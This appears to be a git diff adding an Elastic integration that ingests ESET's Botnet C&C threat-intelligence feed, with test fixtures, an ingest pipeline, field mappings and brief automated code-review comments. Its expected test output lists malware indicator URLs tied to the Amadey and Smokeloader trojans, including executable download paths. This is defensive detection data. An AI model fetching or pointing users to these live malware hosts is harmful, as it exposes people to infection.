@@ -0,0 +1,434 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d4b78820-bf32-4665-a8f8-d5bb1d417502\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/Plugins/clip64.dll']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins/clip64.dll" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--799e3cc2-4cd0-45bb-a33e-eab2d7537a25\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", 
\"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/index.php']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/index.php" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--d756f043-1f54-4b73-b858-098b7af79adb", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--d756f043-1f54-4b73-b858-098b7af79adb\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/nalo.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + 
"modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/nalo.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--17444639-a914-4ec6-9706-68414d448e73", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--17444639-a914-4ec6-9706-68414d448e73\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/foto3553.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/foto3553.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e6a2a190-b5aa-4f95-9565-8a4cf6bb3a37\", \"type\": \"indicator\", \"spec_version\": 
\"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.124.1/theme/Plugins']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.124.1/theme/Plugins" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--18d2048f-24b6-4895-9a01-de0b2fb91300", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--18d2048f-24b6-4895-9a01-de0b2fb91300\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + 
"description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:00:03.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:00:03.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--0be0952c-3056-4220-9c31-c9b7a32a5d2c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:00:03.000Z\", \"modified\": \"2023-10-15T02:00:03.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://77.91.68.52/fuza/sus.exe']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:00:03Z\", \"valid_until\": \"2023-10-17T02:00:03Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:00:03.000Z", + "modified_at": "2023-10-15T02:00:03.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://77.91.68.52/fuza/sus.exe" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--a24fc10b-803e-4804-a5b3-82719a13cacc", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": 
\"indicator--a24fc10b-803e-4804-a5b3-82719a13cacc\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='https://beelowers.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "https://beelowers.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--595b7750-06b6-4c8d-bf0d-0708081ba7af\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/Smokeloader.H trojan\", \"pattern\": \"[url:value='https://transfer.sh/get/QaPzxFmFQh']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET 
Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "https://transfer.sh/get/QaPzxFmFQh" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:10:09.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:10:09.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--c2c4c382-6eb3-4577-947d-2769c29bb1fa\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:10:09.000Z\", \"modified\": \"2023-10-15T02:10:09.000Z\", \"name\": \"example.com\", \"description\": \"C&C of Win32/TrojanDownloader.Amadey.A trojan\", \"pattern\": \"[url:value='http://mikolyda.beget.tech/385119']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:10:09Z\", \"valid_until\": \"2023-10-17T02:10:09Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "last_seen": "2023-10-15T02:10:09.000Z", + "modified_at": "2023-10-15T02:10:09.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "original": "http://mikolyda.beget.tech/385119" + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..01711e14fa8 --- /dev/null 
+++ b/packages/ti_eset/data_stream/cc/_dev/test/system/test-httpjson-config.yml
@@ -0,0 +1,13 @@
+input: httpjson
+service: eti
+vars:
+ username: test
+ password: test
+data_stream:
+ vars:
+ preserve_original_event: true
+ url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/
+ interval: 30s
+ enable_request_tracer: true
+assert:
+ hit_count: 2
diff --git a/packages/ti_eset/data_stream/cc/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..41117cedade
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..459c9fffc4e
--- /dev/null
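Review bot: `auth.basic.user: {{username}}` and `auth.basic.password: {{password}}` are rendered as unquoted YAML scalars, so a credential containing `: `, ` #`, or a leading `*`, `&`, `[`, `{`, `!`, `'` or `"` either breaks the generated input configuration or is parsed into something other than the literal secret. Wrapping the two credential lines in double quotes, `auth.basic.user: "{{username}}"` / `auth.basic.password: "{{password}}"`, covers the common cases, though a value containing `"` or `\` would still need escaping and that limitation is worth a short comment above the two lines. The domains template at packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs is byte-identical (same blob 41117cedade) and needs the same change.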
+++ b/packages/ti_eset/data_stream/cc/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "7d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..4888a266b87
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,148 @@
+---
+description: Pipeline for processing C&C collection feed
+processors:
+ - set:
+ field: ecs.version
+ value: '8.11.0'
+ - set:
+ field: event.kind
+ value: enrichment
+ - append:
+ field: event.category
+ value: threat
+ allow_duplicates: false
+ - append:
+ field: event.type
+ value: indicator
+ allow_duplicates: false
+ - set:
+ field: threat.indicator.provider
+ value: eset
+ - rename:
+ field: message
+ target_field: event.original
+ ignore_missing: true
+ if: ctx.event?.original == null
+ - json:
+ field: event.original
+ target_field: eti
+ - drop:
+ if: ctx.eti?.type != 'indicator'
+ - set:
+ field: threat.feed.name
+ value: "ESET Botnet C&C stix 2.1"
+ - date:
+ field: eti.created
+ target_field: "@timestamp"
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.created != null"
+ - date:
+ field: eti.modified
+ target_field: threat.indicator.last_seen
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.modified != null"
+ - set:
+ field: threat.indicator.modified_at
+ copy_from: threat.indicator.last_seen
+ if: "ctx.threat?.indicator?.last_seen != null"
+ - date:
+ field: eti.valid_until
+ target_field: eset.valid_until
+ formats:
+ - "ISO8601"
+ if: "ctx.eti?.valid_until != null"
+ - rename:
+ field: eti.id
+ target_field: eset.id
+ ignore_missing: true
+ - rename:
+ field: eti.description
+ target_field: threat.indicator.description
+ ignore_missing: true
+ - foreach:
+ field: eti.labels
+ processor:
+ append:
+ field: eset.labels
+ value: "{{_ingest._value}}"
+ ignore_missing: true
+ ignore_failure: true
+ if: ctx.eti?.labels != null
+ - script:
+ lang: painless
+ params:
+ "benign": 'Low'
+ "malicious-activity": 'High'
+ "phishing-activity": 'High'
+ "unwanted-activity": 'Medium'
+ if: ctx.eset?.labels != null
+ source: >
+ for (def label : ctx.eset.labels) {
+ if (params.containsKey(label)) {
+ ctx.threat.indicator.confidence = params.get(label);
+ break;
+ }
+ }
+ - split:
+ field: eti.pattern
+ target_field: eti._patterns
+ separator: ' OR '
+ ignore_missing: true
+ - foreach:
+ field: eti._patterns
+ if: "ctx.eti?._patterns != null"
+ processor:
+ grok:
+ field: _ingest._value
+ patterns:
+ - "^\\[url:value%{SPACE}=%{SPACE}'%{DATA:threat.indicator.url.original}'\\]?"
+ ignore_failure: true
+ - set:
+ field: threat.indicator.type
+ value: url
+ - set:
+ field: threat.indicator.name
+ copy_from: eti.name
+ if: "ctx.eti?.name != null"
+ - remove:
+ field:
+ - eti
+ ignore_missing: true
+ - remove:
+ field: event.original
+ if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+ ignore_failure: true
+ ignore_missing: true
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ description: Drops null/empty values recursively.
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - set:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/ti_eset/data_stream/cc/fields/agent.yml b/packages/ti_eset/data_stream/cc/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/fields/agent.yml
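Review bot: `threat.indicator.type: url` is set unconditionally, but the grok inside the `foreach` over `eti._patterns` runs with `ignore_failure: true`, so a STIX pattern that does not match `[url:value='…']` produces a document typed `url` with no `threat.indicator.url.original`; guard the `set` with `if: ctx.threat?.indicator?.url?.original != null`. Every iteration of that `foreach` also writes the same target field, so for a pattern split on `' OR '` into several clauses only the last clause survives — if that is intended, a one-line comment on the `foreach` saying so would spare the next reader a surprise. The same structure is repeated in the domains pipeline at packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml.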
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/cc/fields/base-fields.yml b/packages/ti_eset/data_stream/cc/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_eset/data_stream/cc/fields/ecs.yml b/packages/ti_eset/data_stream/cc/fields/ecs.yml
new file mode 100644
index 00000000000..d3f9633c4c9
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/fields/ecs.yml
@@ -0,0 +1,36 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.name
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.modified_at
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.feed.name
diff --git a/packages/ti_eset/data_stream/cc/fields/fields.yml b/packages/ti_eset/data_stream/cc/fields/fields.yml
new file mode 100644
index 00000000000..bf7e7383df2
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/fields/fields.yml
@@ -0,0 +1,21 @@
+- name: eset
+ type: group
+ description: >
+ Fields for ESET Threat Intelligence
+
+ fields:
+ - name: id
+ type: keyword
+ description: The UID of the event object.
+ - name: valid_until
+ type: date
+ description: >-
+ Event expiration date.
+ - name: labels
+ type: keyword
+ description: >-
+ Threat labels.
+- name: labels.is_ioc_transform_source
+ type: constant_keyword
+ value: 'true'
+ description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators.
diff --git a/packages/ti_eset/data_stream/cc/lifecycle.yml b/packages/ti_eset/data_stream/cc/lifecycle.yml
new file mode 100644
index 00000000000..326b14e00f6
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/lifecycle.yml
@@ -0,0 +1 @@
+data_retention: 7d
diff --git a/packages/ti_eset/data_stream/cc/manifest.yml b/packages/ti_eset/data_stream/cc/manifest.yml
new file mode 100644
index 00000000000..035c14251c5
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/manifest.yml
@@ -0,0 +1,95 @@
+title: "Botnet C&C"
+type: logs
+ilm_policy: logs-ti_eset.cc-default_policy
+streams:
+ - input: httpjson
+ title: "Botnet C&C"
+ description: Collect data from ETI Botnet C&C feed
+ template_path: httpjson.yml.hbs
+ vars:
+ - name: url
+ description: URL with API root and identifier of C&C collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514)
+ type: text
+ title: Collection URL
+ multi: false
+ required: true
+ show_user: true
